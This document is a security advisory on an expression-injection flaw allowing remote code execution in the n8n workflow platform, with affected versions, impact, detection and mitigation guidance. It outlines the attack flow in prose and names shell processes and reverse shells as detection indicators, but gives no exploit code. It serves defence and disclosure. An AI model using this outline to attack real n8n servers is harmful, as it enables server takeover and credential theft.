Executive Summary

A critical vulnerability, CVE-2025-68613, has been discovered in the popular open-source workflow automation platform n8n. Rated 9.9 on the CVSS scale, this flaw allows for remote code execution (RCE) and affects an estimated 103,000 publicly exposed instances. The vulnerability can be exploited by any authenticated user with permissions to create or edit workflows, a common privilege level. Successful exploitation allows an attacker to execute arbitrary operating system commands, leading to a complete compromise of the host server. Given that n8n is often used as a central hub for connecting sensitive APIs and services, this vulnerability poses a severe risk of data theft and lateral movement across an organization's infrastructure. Administrators are strongly advised to update to a patched version immediately.

Vulnerability Details

The vulnerability is an expression injection flaw within n8n's workflow definition processing logic. The platform's sandboxing mechanism, intended to isolate workflow executions, is insufficient. A low-privileged, authenticated attacker can craft a malicious expression within a workflow that escapes this sandbox. This allows the expression to access and execute commands on the underlying operating system with the same privileges as the n8n process itself. This constitutes a classic RCE scenario, where an attacker can turn limited application access into full server control.

An attack would involve the following steps:

1. The attacker gains authenticated access to an n8n instance, even with minimal permissions (e.g., a basic user account).
2. The attacker creates or modifies a workflow, embedding a specially crafted expression in one of its nodes.
3. When the workflow is executed, the malicious expression is evaluated, breaking out of the sandbox and executing OS commands on the server.

Affected Systems

The vulnerability impacts a wide range of n8n versions:

• All versions from 0.211.0 up to, but not including, the patched versions.

Patched versions that resolve this vulnerability are:

• 1.120.4
• 1.121.1
• 1.122.0

Any self-hosted n8n instance within the vulnerable version range is at risk, particularly the more than 103,000 instances identified as being publicly accessible on the internet.

Exploitation Status

As of December 26, 2025, there were no public reports of this vulnerability being actively exploited in the wild. However, due to the critical severity, the large number of exposed instances, and the relative ease of exploitation for an authenticated attacker, the potential for widespread attacks is high. Security researchers anticipate that threat actors will quickly develop and deploy exploits targeting this flaw.

Impact Assessment

A successful exploit of CVE-2025-68613 can have devastating consequences. Since n8n workflows often store credentials, API keys, and access tokens for various services (databases, cloud platforms, SaaS applications), an attacker compromising the n8n server can exfiltrate this sensitive data. This enables Credential Access (TA0006) on a massive scale. With this access, the attacker can:

• Steal, modify, or delete data from connected systems.
• Manipulate business processes by altering automation logic.
• Use the compromised n8n server as a beachhead to pivot and move laterally within the victim's network (T1219 - Remote Services).
• Deploy additional malware, such as ransomware or cryptominers, on the server.

Detection & Response

1. Version Scanning: The first step is to identify all n8n instances in your environment and check their version numbers against the list of affected versions.
2. Audit Workflow Permissions: Review all user accounts and roles within n8n. Identify all users who have permissions to create or edit workflows. This list represents potential internal or compromised-account threats.
3. Log Monitoring: Monitor n8n application logs and server logs for suspicious activity. Look for the execution of unexpected processes spawned by the n8n service (e.g., sh, bash, powershell.exe). This is a key indicator of a successful RCE exploit. This aligns with D3-PCA: Process Creation Analysis.
4. Network Analysis: Monitor outbound network traffic from the n8n server for connections to unusual IP addresses or ports, which could indicate a reverse shell or data exfiltration channel. This is covered by D3-OTF: Outbound Traffic Filtering.

Mitigation

1. Upgrade Immediately: The primary and most effective mitigation is to upgrade all n8n instances to a patched version (1.120.4, 1.121.1, 1.122.0 or later). This directly remediates the vulnerability. This is a direct application of D3-SU: Software Update.
2. Restrict Permissions (Temporary Mitigation): If patching is not immediately possible, as a temporary measure, restrict permissions for creating and editing workflows to only highly trusted, senior administrators. This reduces the attack surface but does not fix the underlying flaw. This is a form of D3-UAP: User Account Permissions.
3. Harden the Environment: Run the n8n process as a non-root user with minimal privileges. Containerize the application (e.g., using Docker) and apply security contexts to limit its capabilities. This will not prevent exploitation but can limit the post-exploitation impact.
4. Network Isolation: Restrict network access to the n8n instance. If it does not need to be public, place it behind a VPN. Use firewall rules to limit outbound connectivity from the n8n server to only known, required endpoints.